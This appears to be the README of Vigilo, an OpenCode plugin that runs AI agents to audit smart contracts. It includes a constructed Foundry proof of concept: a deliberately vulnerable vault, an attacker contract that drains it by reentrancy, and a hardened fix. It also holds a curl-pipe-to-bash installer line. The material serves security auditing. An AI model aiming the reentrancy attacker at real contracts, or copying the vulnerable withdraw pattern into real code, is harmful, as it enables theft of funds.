vigilo
v1.0.2
Vigilo - Web3 Smart Contract Security Auditing Orchestrator for OpenCode
Vigilo
Web3 Smart Contract Security Auditing Orchestrator - OpenCode Plugin
An autonomous security legion for smart contract auditing, built as an OpenCode plugin. From Latin vigilo — "I watch, I guard." Inspired by the command structure of the Roman army, Vigilo deploys specialized agents to find vulnerabilities before attackers do.
Features
- Automated Audit Workflow: Scope resolution → Recon → Deep Analysis → PoC → Report
- Specialized Auditors: Protocol-specific vulnerability detection
- Multi-Language Support: Solidity, Vyper, Cairo, Rust, Go
- LSP Integration: Language server support for smart contract languages
- Foundry Integration: Built-in tools for forge build/test/coverage
- Parallel Analysis: Spawn multiple auditors (max 3) for comprehensive coverage
- PoC Validation: Generate and validate Foundry tests
Supported Languages
| Language | Extensions | LSP Server | Use Case |
|----------|------------|------------|----------|
| Solidity | .sol | @nomicfoundation/solidity-language-server | EVM chains |
| Vyper | .vy | vyper-lsp | Python-like EVM contracts |
| Cairo | .cairo | cairo-language-server (Scarb) | Starknet/StarkEx |
| Rust | .rs | rust-analyzer | Solana, NEAR, Substrate |
| Go | .go | gopls | Cosmos SDK |
Installation
Prerequisites
Install Plugin
bunx vigilo install
Or manually:
git clone https://github.com/PurpleAILAB/Vigilo.git vigilo
cd vigilo
bun install
bun run build
Install LSP Servers (Optional)
# Solidity (recommended)
npm install -g @nomicfoundation/solidity-language-server
# Vyper
pipx install vyper-lsp
# Cairo (via Scarb; this pipes a remote installer into bash, so fetch and review the script first if your policy requires it)
curl https://get.swmansion.com | bash && starkup
# Rust (rust-analyzer ships as a rustup component)
rustup component add rust-analyzer
# Go
go install golang.org/x/tools/gopls@latest
Usage
Commands
| Command | Description |
|---------|-------------|
| /audit | Start full security audit workflow |
| /poc <finding.md> | Generate and validate PoC for a finding |
Example
# Start OpenCode in your project
cd my-solidity-project
opencode
# Run full audit
/audit
# Generate PoC for a finding
/poc .vigilo/findings/high/H-01-reentrancy.md
Audit Workflow
Phase 0      Phase 1         Phase 2          Phase 3     Phase 4
(scope)      (recon)         (audit)          (PoC)       (report)
   │            │               │                │           │
   ▼            ▼               ▼                ▼           ▼
scope.txt ─→ explorator ─────┐
             speculator ─────┼─→ recon/*.md ─→ centuriones ──→ findings/ ─→ PoC ─→ report
                             │                 (max 3 parallel)
                             └─ protocol type detected
Available Tools
Foundry Tools
| Tool | Description |
|------|-------------|
| forge_build | Compile Solidity contracts |
| forge_test | Run tests with configurable verbosity |
| forge_coverage | Generate code coverage |
| cast_call | Query contract state |
Agent Tools
| Tool | Description |
|------|-------------|
| delegate_task | Spawn specialized auditors |
| background_output | Get background audit results |
| background_cancel | Cancel running audits |
| background_list | List all audit tasks |
| skill | Load specialized audit skills |
Reconnaissance Agents (Exploratores & Speculatores)
| Agent | Latin Role | Focus |
|-------|-----------|-------|
| explorator | Scout (Exploratores) | Code structure, execution flows, asset locations, protocol type |
| speculator | Intelligence (Speculatores) | Protocol design, invariants, trust assumptions from documentation |
Specialized Auditors (Centuriones)
| Auditor | Focus |
|---------|-------|
| reentrancy-auditor | Checks-effects-interactions (CEI) violations, cross-function/contract reentrancy |
| oracle-auditor | Oracle manipulation, price feed attacks |
| access-control-auditor | Permission vulnerabilities |
| logic-auditor | Business logic errors |
| flashloan-auditor | Flash loan attack vectors |
| defi-auditor | DeFi-specific vulnerabilities |
| cross-chain-auditor | Bridge and cross-chain vulnerabilities |
| token-auditor | ERC20/721/1155 implementation issues |
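What a validated PoC for the reentrancy-auditor's CEI finding looks like in practice, as an added Foundry example. The contracts and test below are constructed for illustration and are not Vigilo's code or output: `VulnerableVault` sends ETH before zeroing the caller's balance (the CEI violation the auditor flags), `SafeVault` is the hardened form with the effect moved before the interaction, and `Attacker` re-enters `withdraw()` from its `receive()` hook. The first test proves the vault is drained; the second proves the same attack reverts against the fixed contract, which is the kind of pass/fail evidence the PoC phase records under `.vigilo/poc/`. Run it with the standard `forge test --match-contract ReentrancyPoC -vvvv` in a project that has `forge-std` installed.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.20;

import "forge-std/Test.sol";

// Constructed vulnerable vault (not part of Vigilo): the ETH transfer happens
// before the balance is cleared, so the callee can call withdraw() again.
contract VulnerableVault {
    mapping(address => uint256) public balances;

    function deposit() external payable {
        balances[msg.sender] += msg.value;
    }

    function withdraw() external {
        uint256 amount = balances[msg.sender];
        require(amount > 0, "nothing to withdraw");
        (bool ok, ) = msg.sender.call{value: amount}(""); // interaction ...
        require(ok, "transfer failed");
        balances[msg.sender] = 0;                          // ... before effect (CEI violation)
    }
}

// Hardened variant: same interface, balance cleared before the external call.
contract SafeVault {
    mapping(address => uint256) public balances;

    function deposit() external payable {
        balances[msg.sender] += msg.value;
    }

    function withdraw() external {
        uint256 amount = balances[msg.sender];
        require(amount > 0, "nothing to withdraw");
        balances[msg.sender] = 0;                          // effect first
        (bool ok, ) = msg.sender.call{value: amount}("");  // then interaction
        require(ok, "transfer failed");
    }
}

interface IVault {
    function deposit() external payable;
    function withdraw() external;
}

// Attacker contract: re-enters withdraw() from receive() while the vault
// still holds at least one more payout.
contract Attacker {
    IVault public immutable vault;

    constructor(IVault _vault) {
        vault = _vault;
    }

    function attack() external payable {
        vault.deposit{value: msg.value}();
        vault.withdraw();
    }

    receive() external payable {
        // msg.value is the payout just received; keep draining in equal chunks.
        if (address(vault).balance >= msg.value) {
            vault.withdraw();
        }
    }
}

contract ReentrancyPoC is Test {
    address victim = makeAddr("victim");

    function setUp() public {
        vm.deal(address(this), 1 ether); // funds the attacker's deposit
        vm.deal(victim, 10 ether);
    }

    function testExploit_VulnerableVault() public {
        VulnerableVault vault = new VulnerableVault();
        vm.prank(victim);
        vault.deposit{value: 10 ether}();

        Attacker attacker = new Attacker(IVault(address(vault)));
        attacker.attack{value: 1 ether}();

        // The attacker recovers its 1 ETH deposit plus the victim's 10 ETH.
        assertEq(address(vault).balance, 0);
        assertEq(address(attacker).balance, 11 ether);
    }

    function testExploitFails_SafeVault() public {
        SafeVault vault = new SafeVault();
        vm.prank(victim);
        vault.deposit{value: 10 ether}();

        Attacker attacker = new Attacker(IVault(address(vault)));
        // The re-entrant withdraw() sees a zeroed balance and reverts inside
        // receive(); the low-level call returns false and the outer withdraw()
        // reverts with "transfer failed", unwinding the whole transaction.
        vm.expectRevert(bytes("transfer failed"));
        attacker.attack{value: 1 ether}();
        assertEq(address(vault).balance, 10 ether);
    }
}
```

The second test is as important as the first for a finding's PoC log: a fix is only validated when the same attacker contract that drained the vulnerable contract is shown to fail against the patched one.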
Directory Structure
.vigilo/
├── recon/      # Explorator & Speculator outputs
├── findings/   # Vulnerability findings
│   ├── high/
│   └── medium/
├── poc/        # PoC validation logs
└── reports/    # Final reports
Configuration
Create .vigilo/config.json in your project:
{
  "disabled_skills": [],
  "disabled_agents": []
}
Environment Variables
| Variable | Description |
|----------|-------------|
| VIGILO_DEBUG | Enable debug logging |
| DEBUG | General debug mode |
License
- Non-production use: Free
- Production use: Requires commercial license
- Change Date: 2029-01-21 (converts to Apache-2.0)
